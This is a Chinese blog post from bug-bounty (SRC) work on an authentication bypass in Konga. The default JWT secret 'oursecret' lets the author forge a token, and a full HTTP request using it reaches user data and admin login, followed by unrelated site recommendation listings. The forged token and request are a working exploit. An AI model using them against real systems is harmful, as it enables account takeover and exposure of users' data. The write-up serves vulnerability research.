SRC挖掘中的权限绕过,导致的任意用户登录

于 2024-09-05 15:14:55 发布
阅读量171 收藏
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52579508/article/details/141948459
版权

在挖src中遇到的一个nday

8e1999d0529e4515dbb4e6857659c758.png

https://konga-xxxxx.com/

cf91d58d11e31a827f3369649b54e171.png

由于 Konga 使用了默认的 密钥 可以构造jwt来造成任意用户登录

漏洞利用:

先使用 jwt网站来构造

https://jwt.io/#debugger-io

42eaf52dfc82ee1289f6b36b2776a063.png

oursecret 密钥

生成的值:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.MQ.gSssTBEVe6X9aFEd0H_tt8kk2u7df90W1eOzNRnrsQ4

抓包 构造

先看没有构造的

7957608f4245cc24993a13de05feb4fe.png

这里是没有数据 看不了后台api/user 的数据

加上刚才的jwt

GET /api/user HTTP/1.1
Cache-Control: max-age=0
Sec-Ch-Ua: 
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
authorization:Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.MQ.gSssTBEVe6X9aFEd0H_tt8kk2u7df90W1eOzNRnrsQ4
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

/api/user 接口
bf62d0bc5e89ea8802f731d25fb4060d.png

Cookie 用户名 邮箱这些都爆出来可以查看了

/api/kongnode 接口

3488238b3fc1998a7ade076bf19d4b4c.png

直接构造 登录

09522a87a7b6d14c4bd426afadfbb7ca.png

直接任意用户登录 成为管理员

小龙_(
关注
SRC漏洞挖掘实战经验总结
10-28
5. **逻辑漏洞**:这类漏洞往往不涉及代码层面,而是由于业务逻辑设计不合理,导致攻击者可以通过特定操作绕过安全控制。 挖掘技术包括静态分析、动态分析和模糊测试等。静态分析通过对源代码或二进制文件进行分析...
国内SRC漏洞挖掘经验和技巧分享.pdf
09-10
"SRC漏洞挖掘经验和技巧分享" 本文档主要分享了SRC漏洞挖掘的...本文档分享了SRC漏洞挖掘的经验和技巧,涵盖了SRC个人推荐、SRC的规则、漏洞挖掘的个人经验和技巧分享等方面,为读者提供了SRC漏洞挖掘的实践指南。
新手SRC漏洞挖掘经验分享
08-21
在这篇文章,我们将分享一些SRC漏洞挖掘的经验和知识,包括SRC的概念、入坑潜规则、信息收集、漏洞挖掘等方面。 SRC的概念 SRC(Security Response Center)是安全应急响应心,负责处理和响应安全事件。SRC...
国内SRC漏洞挖掘技巧与经验分享
01-29
4. **Web应用漏洞**:国内SRC,Web应用漏洞占比较大。SQL注入、XSS跨站脚本、CSRF跨站请求伪造等常见漏洞需要特别关注。理解OWASP Top Ten,掌握各种攻防策略,有助于提高挖掘效率。 5. **安全配置**:不正确的...
【超强组合】基于淘金优化算法GRO-BP-Adaboost的数据分类预测算法Matlab实现.rar
10-08
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
VMware Workstation Pro 和 VMware Fusion 安装与配置指南
10-08
内容概要:本文档详细指导了如何在不同的主机环境下,通过 VMWare 的两款产品——Workstation Pro 和 Fusion 进行新虚拟机的构建流程以及具体的操作要点说明。 适用人群:希望在单一机器上部署多操作系统的工作环境或学习测试场景的技术人员和学生。 使用场景及目标:旨在帮助初学者搭建属于自己的虚拟机实验平台,从而方便进行软件测试或者研究操作系统相关的新特性等任务,同时也有利于团队间的协作和资源调配。 注意事项:文涉及的具体操作如下载源文件、配置网络参数时要注意版权合法性问题和技术安全防范。此外还需依据各自电脑的软硬件条件适当增减虚拟机的资源设定。
科研经费管理系统 SSM毕业设计 源码+数据库+论文(JAVA+SpringBoot+Vue.JS).zip
10-08
科研经费管理系统 SSM毕业设计 源码+数据库+论文(JAVA+SpringBoot+Vue.JS) 启动教程:https://www.bilibili.com/video/BV1GK1iYyE2B
使用Python Matplotlib进行图形输出与保存详解(包含详细的完整的程序和数据)
10-08
内容概要:本文详细介绍了使用 Python 的 Matplotlib 库来输出和保存图形的方法。不仅涉及了基本流程,如生成图表并将之导出成PNG、PDF和SVG等不同格式的内容,还包括高级话题如设置透明度、分辨率以及制作包含图形元素的HTML页面等。文章通过一个具体的示例代码讲解了各个环节的关键细节和技术要点。 适用人群:对数据可视化有兴趣的初学者及具有一定基础想要深入学习 Matplotlib 使用技巧的技术人员。 使用场景及目标:适用于需要掌握 Matplotlib 不同输出选项及其特点的应用场合,尤其是当需要生成用于打印或网页展示的高质量、可自定义外观的图形时。
【数字信号分离】基于matlab自然梯度算法盲信号分离(含串音信号 变步长)【含Matlab源码 8813期】.zip
10-08
CSDN海神之光上传的代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b或2023b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博客文章底部QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 功率谱估计: 故障诊断分析: 雷达通信:雷达LFM、MIMO、成像、定位、干扰、检测、信号分析、脉冲压缩 滤波估计:SOC估计 目标定位:WSN定位、滤波跟踪、目标定位 生物电信号:肌电信号EMG、脑电信号EEG、心电信号ECG 通信系统:DOA估计、编码译码、变分模态分解、管道泄漏、滤波器、数字信号处理+传输+分析+去噪(CEEMDAN)、数字信号调制、误码率、信号估计、DTMF、信号检测识别融合、LEACH协议、信号检测、水声通信
基于多元宇宙优化算法MVO优化CNN-BiGRU-Attention锂电池健康寿命预测算法研究Matlab实现.rar
最新发布
10-08
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
vue基于spring boot的钢材销售管理系统的设计与实现毕业设计源码.zip
10-08
本系统基于B/S结构模式,采用idea开发环境,建模工具Visio,以及关系型数据库MySQL。 系统采用前后端分离的模式进行开发。前端开发负责页面的编写及数据的渲染。后端开发负责提供API(接口)。前后端采用指定的API接口进行交互 其主要开发包括后台数据库的设计建立,数据库维护以及前后端应用程序(WEB)设计编码。 前端:vue.js+ElementUI 开发工具:IDEA 或者eclipse都支持 编程语言: java 框架:springboot 数据库: mysql 版本不限 数据库工具:Navicat/SQLyog都可以
【气动学】复合控制模式下导弹拦截仿真(方式:滑模控制方法与直接力相结合)【含Matlab源码 8824期】.mp4
10-08
Matlab领域上传的视频均有对应的完整代码,皆可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描视频QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
Docker Desktop 4.24.2 for macOS BigSur
10-08
支持 BigSur(macOS version 11) 的最后一个版本。
沙特阿拉伯2024年电动汽车以及充电基础设施展望.pdf
10-08
电动化交通进展: 沙特阿拉伯正在积极推动电动化交通的发展,目标是增加电动汽车(EV)的普及率。 报告指出,尽管面临一些挑战,但EV市场正在逐步扩大,包括私人和商业用途的EV数量都在增加。 基础设施建设: 沙特计划大规模投资建设电动汽车充电站网络,以满足日益增长的EV充电需求。 目前,充电站的数量相对较少,但预计到2035年,将需要约160,000个充电站来支持330万辆EV。 价格与成本考量: 电动汽车的初购价格和保险费用通常高于传统内燃机汽车(ICE),但总拥有成本(TCO)因维护成本较低而可能更具优势。 商业买家往往能获得更大的折扣,使EV在商业应用更具成本效益。 电池效率与气候影响: 沙特阿拉伯的高温环境对电动汽车的电池效率和寿命构成挑战。 EV在高温下需要额外的能量来冷却电池,这会影响其续航能力和充电速度。 能源与排放: EV的普及有助于减少碳排放,因为它们使用清洁的电力作为能源。 随着可再生能源在沙特电力供应的比例增加,EV的环保效益将进一步增强。 政策与激励措施: 沙特政府正在制定政策,鼓励国内EV制造和组装,以吸引汽车制造商并创造就业机会。 政府还提供了一系列激励措施
PV光伏阵列+Boost DCDC变器+负载+双向DCDC变器+锂离子电池系统 Matlab Simulink仿真模型 模型主要
10-08
PV光伏阵列+Boost DCDC变器+负载+双向DCDC变器+锂离子电池系统 Matlab Simulink仿真模型 模型主要包括以下几个部分: PV光伏阵列、Boost DC DC 变器、负载Load、双向DC DC变器、锂离子电池模型、PV侧控制模块、锂离子电池侧控制模块以及观测模块。 PV控制模块采用最大功率点跟踪算法MPPT,具体是“扰动观察法” 系统的工作状态主要由输入参数辐照度决定: [1]当辐照度较小以至于不能满足负载功率需求时,锂离子电池会进行输出,SOC逐渐降低; [2]当辐照度较大使得光伏阵列输出功率高于负载需求功率时,锂离子电池会将多余功率进行回收,相当于对电池进行充电,SOC升高; 图2为模拟结果展示,可以发现整个过程,负载电压能够稳定在设定值48V,锂离子电池也能够很好地协同工作。
CODESYS的CNC运动控制可视化轨迹3DPath仿真
10-08
使用CODESYS软件的CNC功能,通过插补程序,做一个文字可视化轨迹3DPath仿真。
【超强组合】基于VMD-矮猫鼬优化算法DMOA-Transformer-LSTM的光伏预测算研究Matlab实现.rar
10-08
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
VIENNA维也纳拓扑,三相整流仿真模型:采用电压电流双闭环控制,电压外环采用PI控制,电流内环采用bang bang滞环控制
10-08
VIENNA维也纳拓扑,三相整流仿真模型:采用电压电流双闭环控制,电压外环采用PI控制,电流内环采用bang bang滞环控制。 整流电压稳定在600V 有相关参考资料。
水面船舶固定时间领导跟随编队控制;固定时间编队;领导跟随算法
10-08
水面船舶固定时间领导跟随编队控制;固定时间编队;领导跟随算法
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值